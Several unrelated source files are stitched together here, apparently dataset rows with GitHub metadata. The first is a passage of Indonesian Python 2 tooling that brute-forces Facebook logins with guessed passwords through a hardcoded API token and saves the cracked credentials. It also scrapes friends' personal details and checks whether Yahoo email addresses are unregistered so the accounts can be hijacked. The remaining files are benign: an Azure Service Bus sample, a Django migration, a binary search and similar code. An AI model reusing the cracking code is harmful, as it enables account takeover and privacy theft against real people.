print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__=='__main__':
menu()
masuk() | [
"noreply@github.com"
] | dikaxyz.noreply@github.com |
cd875ae9154411e11bc7bbb1327119dc33fdb82b | 894f0bae6d13e5345e83d2eb8ef4c7b9af74cd67 | /label_studio_converter/__init__.py | a7078281d1dc6a1a2ea62f35a9adf9309be5b50d | [
"Apache-2.0"
] | permissive | rchuzh99/label-studio-converter | 8b971efbc577a5a5fb065fa442b298bca1ee08f5 | 9037271425964a96c3f06214e1d6e9b929427d40 | refs/heads/master | 2023-06-07T02:55:32.572636 | 2021-06-30T17:44:45 | 2021-06-30T17:44:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | from .converter import Converter
__version__ = '0.0.29'
| [
"makseq@gmail.com"
] | makseq@gmail.com |
c5e34b3d9082d716d3929ab37cc6b161f0b0a0ae | f87096577b8a509c182e25ab273e53d92d09ce7f | /sdk/servicebus/azure-servicebus/samples/async_samples/receive_deferred_message_queue_async.py | 76a55a185c77be2f4bf54674d204fcbea5fba5c4 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | bradleydamato/azure-sdk-for-python | a47755f0b6f686e5a83c40a956485ccefb30e5ea | 4bde81cd274e91aead0c5d3d65632d10b44be79b | refs/heads/master | 2023-03-16T08:07:35.987865 | 2020-10-20T21:52:38 | 2020-10-20T21:52:38 | 300,750,124 | 0 | 0 | MIT | 2020-10-12T13:42:46 | 2020-10-02T22:32:37 | null | UTF-8 | Python | false | false | 2,063 | py | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
Example to show receiving deferred message from a Service Bus Queue asynchronously.
"""
# pylint: disable=C0111
import os
import asyncio
from azure.servicebus import Message
from azure.servicebus.aio import ServiceBusClient
CONNECTION_STR = os.environ['SERVICE_BUS_CONNECTION_STR']
QUEUE_NAME = os.environ["SERVICE_BUS_QUEUE_NAME"]
async def main():
servicebus_client = ServiceBusClient.from_connection_string(conn_str=CONNECTION_STR)
async with servicebus_client:
sender = servicebus_client.get_queue_sender(queue_name=QUEUE_NAME)
messages = [Message("Message to be deferred") for _ in range(10)]
async with sender:
await sender.send_messages(messages)
receiver = servicebus_client.get_queue_receiver(queue_name=QUEUE_NAME)
async with receiver:
received_msgs = await receiver.receive_messages(max_message_count=10, max_wait_time=5)
deferred_sequenced_numbers = []
for msg in received_msgs:
print("Deferring msg: {}".format(str(msg)))
deferred_sequenced_numbers.append(msg.sequence_number)
await msg.defer()
if deferred_sequenced_numbers:
received_deferred_msg = await receiver.receive_deferred_messages(
sequence_numbers=deferred_sequenced_numbers
)
for msg in received_deferred_msg:
print("Completing deferred msg: {}".format(str(msg)))
await msg.complete()
else:
print("No messages received.")
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
print("Receive is done.")
| [
"noreply@github.com"
] | bradleydamato.noreply@github.com |
6fe06785c386a9016a2f59d60af27f95a518434d | dd663188feb9e546d73c633acd3e1ae862adef16 | /binary-search/bynary-search.py | ee321eb6c44f10a14d4242afe1194a6d35a2d798 | [] | no_license | madsonrda/coding-challenge | 969c64fd2aab038e17e7316f4653a490fd667576 | de6f8fa89a058296bdfeb5bcd4394b8a54f9f935 | refs/heads/master | 2020-04-15T01:01:55.309126 | 2019-01-14T00:47:35 | 2019-01-14T00:47:35 | 164,260,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | import math
def main():
'''
input:
first line is the integer value to be found in the sorted array
second line is a sorted integer list with the numbers separated by blank space.
ex:
2
1 2 4 7 9 11
'''
value = int(raw_input())
array = map(int,raw_input().split())
bs = BinarySearch(array,value)
print(bs)
def BinarySearch(array,value):
'''
array: sorted int list
value: value to be found in the list
return: if the value was found retunr the index of the list, else return -1
'''
l = 0
r = len(array) -1
pivot = int(math.floor((l+r)/2))
while l <= r:
if array[pivot] < value:
l = pivot + 1
pivot = int(math.floor((l+r)/2))
elif array[pivot] > value:
r = pivot -1
pivot = int(math.floor((l+r)/2))
else:
return pivot
return -1
if __name__ == '__main__':
main()
| [
"madsonrda@gmail.com"
] | madsonrda@gmail.com |
2a63f379dcc35040db9c3f77367104b8278216a0 | d3916619ec8e7365e9faf453a78c80cbaf14f4b0 | /app/GameOverv2.0.py | 8a1055f3e59b1bbb23253570d07d4d501fc94b4b | [] | no_license | SharapILN/DousonPython | 40990fef2d6e4bc2ecdc0b722c013cf6bf63b1e2 | c66c77ecc80f780914892da9191098787146968d | refs/heads/master | 2020-04-17T04:55:47.779325 | 2019-02-12T07:03:33 | 2019-02-12T07:03:33 | 166,253,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | print('Программа "Game Over" 2.0')
print('То же', 'самое', 'сообщение')
print('Только',
'чуть-чуть',
'побольше')
print('Вот', end=' ')
print('оно...')
print(
"""
_____ ___ ___ ___ _____
/ ____| / | / |/ | | ___|
| | / /| | / /| /| | | |_
| | _ / ___ | / / |__/ | | | _|
| |_| | / / | | / / | | | |___
\_____/ /_/ |_| /_/ |_| |_____|
_____ _ _ _____ _____
/ _ \ | | / / | ___| | _ \
| | | | | | / / | |_ | |_| |
| | | | | | / / | _| | _ /
| |_| | | |/ / | |___ | | \ \
\_____/ |___/ |_____| |_| \_\
"""
)
input('\n\nНажмите Enter, чтобы выйти.')
| [
"sharap.iln@gmail.com"
] | sharap.iln@gmail.com |
f67df51e6d94d01fe71d5522766224636a66f792 | 2ed6c65b4b7c7052af630fe4fa187896b9d34573 | /test_app/migrations/0001_initial.py | b8c3b7132a25004a4faad346f57bce5d8b86f323 | [] | no_license | JpBongiovanni/UserDashboard | 26d1293b4a733f752c3d4bc543bea93a4a92df27 | 3df5fe21f12f6e689cd9c0c462cd312c05970904 | refs/heads/master | 2023-02-02T13:56:38.861766 | 2020-12-19T13:16:13 | 2020-12-19T13:16:13 | 321,970,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,450 | py | # Generated by Django 2.2 on 2020-12-17 12:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('registration_app', '0002_user_description'),
]
operations = [
migrations.CreateModel(
name='Wall_message',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('poster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_messages', to='registration_app.User')),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('poster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_comments', to='registration_app.User')),
],
),
]
| [
"jpbongiovanni@gmail.com"
] | jpbongiovanni@gmail.com |
b91aeaf6eccdee3cfd5c4046c3499f4acbf97480 | ac20f12a62f8177783301f54e8641d4359c6e933 | /__MC_ICC16_Alg1.py | dd391d7de73f3e2f9cc31db7f0f73f970564f6fa | [] | no_license | GZQZQQ/ryuappforalg1 | f356520373876ecef3a3c118fca9b37580ef9846 | e6fbb7788029d03adb1e7afa9b18f3f3a1358c7e | refs/heads/master | 2021-01-10T17:20:34.061123 | 2016-02-17T05:10:53 | 2016-02-17T05:10:53 | 49,276,002 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 55,163 | py | #coding=utf-8
##### 2015-09-13: Implement the Markov-Chain based approximated algorithm to solve MBSR problem.
##### 2016-01-20: Implement the thread-controlling alg1.(Huawei)
import random
import math
import time
import thread
class MC_ICC16_Alg:
def __init__(self,*args):
self.objNetworkMonitor = args[0]
### ==================== Given the Inputting paths between each Ctrler and SW-node.
self.PathData_file = '_PathSet.txt'; # global file-var
self.Traffic_file = '_TrafficDemands.txt'; # global file-var
self.Cap_links_file = '_Cap_links.txt'; # global file-var
self.Cap_MBoxes_file = '_Cap_MBoxes.txt'; # global file-var
#self.f1 = open("mcicc16_dugflie.txt",'w')
#self.f1.write("get arg ok \n")
#self.f1.write("why show \n")
self.PathSet_cand = {} ## {(Src,Dst):[path1_id, path2_id,...,path_|Js|_id]}, the candidate path-set for all pairs.
#self.f1.write("21 \n")
#self.f1.flush()
self.TDSet = {} ## {(Src):Rate}, the Traffic-Demand set of all Client-Flow.
self.Cap_MBoxes = {} ## {MBox_id:CapVal}, the Capacity Middle-Boxes in Topology.
#self.f1.write("31 \n")
#self.f1.flush()
self.Cap_links = {} ## {(u,v):CapVal}, the Capacity set of all links in Topology.
#self.f1.write("41 \n")
#self.f1.flush()
self.Nodes_set = []; ## Record all nodes in topology graph.
self.Edges_set = {}; ## {Edge_id:(u1,v1)}, Record all edges in topology.
self.Paths_set = {}; ## { Path_id: [path_content:(path_src,next_node,...,path_dst)] }, Record all given paths in topology graph.
#self.f1.write("51 \n")
#self.f1.flush()
self.list_MBoxDst_id = []; ## Middlebox-Connected-Switches. [10, 21, 33, 50]
self.list_CFlowSrc_id = []; ## Client-Flow-Src-switches.
##==============================================================
self.PathSet_selected = {} ## {(Src_CFlow,Dst_MBox):[path1_id,path2_id,...,[path_|Ds|]_id]}, the In-Use path for all CFs.
self.MBoxSet_assigned = {} ## {(MBox_id):[CFlow1_id,CFlow2_id,...]}, the holding ClientFlows of each MiddleBox.
